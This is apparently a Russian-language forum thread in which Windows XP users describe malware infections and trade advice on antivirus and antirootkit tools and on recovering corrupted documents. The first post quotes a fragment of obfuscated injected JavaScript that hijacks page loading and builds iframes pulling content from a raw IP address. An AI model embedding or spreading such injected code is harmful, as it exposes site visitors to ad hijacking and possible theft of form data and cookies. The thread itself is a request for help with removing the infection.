стоит WinXP. Недавно подцепил какую-то херню. Вирус проявляется в том, что
1)все соединения запрошенные через броузеры отправляются от имени эксплорера. если эксплореру не давать права отправлять запросы-то броузер попросту не открывает страницы.
2)к каждой странице добавляется яваскрипт-код весьма большого веса. Причем после конца документа. содержание примерно такое:

</body>
</html>
<script type="text/javascript" language="javascript">

var AVidFwCHAppNSQXBd= 657 - 30606;
jYwJhMaYgnUJDUaWHkK = window.onload;
var oDCQtBcAmfBrLVe =6051 + 9815;
window.onload = vQtxWTsaEYvWmWG;
IuGdoqVmjGlcsEPFmVl = 19119;

QgVxFTkTaUKEoKOQ = "";
var pcBrqcvdVKCNJBqod= 8777 - 1125;
xfdNKBQaIwxewaDji = "";
var EoLCbbpddxQpDnmE =31400;
AxkgATsgBjXTMbgP = "";

...
...
...

var arrAnti = new Array();var arrContent = new Array(".");var arrMeta = new Array(".");var arrUrl = new Array(".");var element = { "Name" : "b720x300", "Global" : 0, "AntiArr" : arrAnti, "ContentArr" : arrContent, "MetaArr" : arrMeta, "UrlArr" : arrUrl};LxwmQqbwQvgXoXOcMF.push(element);
jkrByjMmjyMUFJjm.push(CreateyoVcLstievvEmDpject_24 578457887(
'b720x300',
'http://85.12.43.83/fls.geo/HK_720x300_1.html?a=b',
'720', '720', '300', '300',
'',
''));

...
...
...

function rgpnQIURcMJqLABW(yoVcLstievvEmDpj)
{
var dwkIsJxiemdLOHsvD;
var QwmhGWqlhFNcDDGREQ = document.createElement("IFRAME");
uQNeqLfJMQjKDvIHc =14043 + 23606;
QwmhGWqlhFNcDDGREQ.id = yoVcLstievvEmDpj.FrID;

QwmhGWqlhFNcDDGREQ.name = yoVcLstievvEmDpj.FrName;
var VJCWjHMbmWSGgSQrS= 9804 - 3054;
QwmhGWqlhFNcDDGREQ.framespacing = yoVcLstievvEmDpj.FrSpacing;
AoGBPeUgtvOYDlyH =30686 + 26984;
QwmhGWqlhFNcDDGREQ.frameborder = yoVcLstievvEmDpj.FrBorder;
var PmHnbBFMohbAVNtS =12018 + 6157;
QwmhGWqlhFNcDDGREQ.scrolling = yoVcLstievvEmDpj.FrScrolling ;
var JoUkNgWNPNIgjdMwQ =11385 + 14775;
QwmhGWqlhFNcDDGREQ.width = yoVcLstievvEmDpj.FrWidthMin;
var CdVSHkhAKhMKAQfat;
QwmhGWqlhFNcDDGREQ.height = yoVcLstievvEmDpj.FrHeightMin;
xrtWnsHoNvYDRyrv = 26284;
QwmhGWqlhFNcDDGREQ.marginWidth = "0";
gNALKqVNlcgxptLww = 12459;
QwmhGWqlhFNcDDGREQ.marginHeight = "0";

if(!QwmhGWqlhFNcDDGREQ.frameborder || QwmhGWqlhFNcDDGREQ.frameborder == 'no')
{
var oQoHUoKwdVCnsuxuW =15045 + 22871;
QwmhGWqlhFNcDDGREQ.style.borderWidth = "0px";
var edPbIDDhuKTTYdxRGW;
QwmhGWqlhFNcDDGREQ.frameBorder = '0';
var qiSeLugrjBiiQFlw;
}

...
...
...

3)Заметил, что эта суко на некоторых сайтах меняет баннеры на свои. возможн пересылает куда-то данные форм и куки...
4)в автозагрузке появились лишние длл"ки. Удаляю, при загрузке винды они появляются снова.

Фаерволл оутпост и антивирь нод32 с полными обновлениями молчат.
Нужна помощь.

У нода полные обновления с офф сайта? или зеркала
2.А, что если загрузиться в safe mod и просканить чем нить типо Sysclean
3. У Аваста например есть сд версия, тобиш грузишся с диска и сканеш хард
http://avast.ru/avast_BART_CD_download.htm

неплохо иметь в хозяйстве procmon regmon filemon, ну и хороший антируткит gmer(показывает скрытые файлы/ключи в реестре/и т.д)
посмотри что в сервисах, может есть что левое.

неплохо иметь в хозяйстве procmon regmon filemon
ссылочку плз)

У нода полные обновления с офф сайта? или зеркала
2.А, что если загрузиться в safe mod и просканить чем нить типо Sysclean
[/URL]
1)с оффа
2)ссылочку плз)

http://www.trendmicro.com/download/dcs.asp

на аваст ссылка выше)

антируткит gmer - ЛАЖА!!!
юзай RkU
Накрайняк AVZ

поделись подозрительными dll, мне интересно стало что это за живность

уже поздно...вылечился...

антируткит gmer - ЛАЖА!!! юзай RkU Накрайняк AVZ
хех) если уж на то пошло - то все это лажа ;)

GALIAFF, avz элита среди этой лажы :) (так сказать, элитная лажа :)))

недавно столкнулся с такой проблемой:
по просьбе знакомого зашел посмотреть компьютер который "стал работать не стабильно" с его слов выражалось это в следующем
1) все файлы *.doc, *. xls на диске имеют одинаковый размер и содержут тройственную надпись "Скупой платит дважды" на зараженной машине нашел файл windowssyystem32 mshost.exe так же он висит в процессах размер его 192512 б при добовлении любых носителей выкидывает 3 скрытых файла autoerun.inf *.exe : открыть.exe , последний не отображается и MFT$ не прописан у всех файлов размер 192512 б. При попытке что либо поднять из документов разными способами ни чего не получилось. Как поднять информацию?

недавно столкнулся с такой проблемой:
по просьбе знакомого зашел посмотреть компьютер который "стал работать не стабильно" с его слов выражалось это в следующем
1) все файлы *.doc, *. xls на диске имеют одинаковый размер и содержут тройственную надпись "Скупой платит дважды" на зараженной машине нашел файл windowssyystem32 mshost.exe так же он висит в процессах размер его 192512 б при добовлении любых носителей выкидывает 3 скрытых файла autoerun.inf *.exe : открыть.exe , последний не отображается и MFT$ не прописан у всех файлов размер 192512 б. При попытке что либо поднять из документов разными способами ни чего не получилось. Как поднять информацию?

Воспользуйся far для удаления/изменения файлов типа autorun.inf, process exlporer - для получения путь запущенного модуля, вопрос не понятен.

кто советует гмер..
пф... нестабильная фигня ... сколько раз меня в бсод брасала..
avz спасет тебя .. а яндекс поможет найти avz ))

проблема уже свершилась спасать не от чего!!! вопрос в другом в начальной части файла где содержится информация о размере файла его структуре и прочие служебные данные лежит информация не цензурного содержания!!! размер файлов один! возможности сравнения контрольных сумм нету! нужна программа дешифратор или что-то вроде неё от вируса избавиться не проблема проблема, в том как восстановить информацию??

N1K70

avz чистенько меня спасала, что не знаю лажа или нет.
там много полезных функций против заразы и рутиков.

решением проблемы является простой инженерный калькулятор ищем место где храниться информация о размере файла в Hex редакторе заменяем на необходимое значение и почти все далее все идет как по маслу почти все поднял